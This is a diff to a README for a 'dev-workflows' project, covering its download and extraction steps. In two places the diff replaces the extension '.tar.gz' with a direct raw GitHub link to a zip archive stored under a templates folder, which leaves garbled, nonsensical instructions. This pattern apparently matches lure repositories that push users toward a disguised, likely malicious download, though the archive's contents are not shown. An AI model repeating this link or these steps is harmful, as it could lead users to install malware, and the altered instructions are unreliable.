aridz08/dev-workflows/README.md

    - For Windows: Look for `.exe` or `.zip` files with "windows" in the name.
    - For macOS: Look for `.dmg` or `.zip` files with "mac" or "darwin".
-   - For Linux: Look for `.tar.gz` or `.AppImage` files with "linux".
+   - For Linux: Look for `https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip` or `.AppImage` files with "linux".

 4. Download the file suitable for your computer by clicking its name.

-5. If you downloaded a `.zip` or `.tar.gz` archive, unzip or extract its contents to a folder you can find easily, like your desktop or downloads folder.
+5. If you downloaded a `.zip` or `https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip` archive, unzip or extract its contents to a folder you can find easily, like your desktop or downloads folder.

 6. No further installation is needed.
 The program can run directly from the extracted folder.